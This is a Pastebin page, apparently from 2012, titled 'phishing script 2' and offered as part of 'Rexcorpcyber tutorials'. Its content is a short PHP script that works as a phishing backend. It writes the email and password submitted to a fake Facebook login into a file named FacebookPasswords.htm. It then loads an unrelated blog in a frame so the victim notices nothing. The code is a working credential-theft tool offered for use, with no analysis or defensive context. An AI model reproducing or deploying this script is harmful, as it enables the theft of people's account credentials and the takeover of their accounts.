Advertisement
joerex101

phishing script 2

Dec 12th, 2012
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.31 KB | None | 0 0
  1. <?php /* Created by Rex for Rexcorpcyber tutorials */
  2. $fp = fopen("FacebookPasswords.htm", "a");
  3. fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
  4. echo "<HTML>
  5.  
  6. <head>
  7. <title>Welcome to CopyPaste</title>
  8. <FRAMESET cols=\"*\">
  9.  <FRAME SRC=\"http://www.www.thecopypasteblog.com\">
  10.  
  11.  
  12. </FRAMESET>";?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement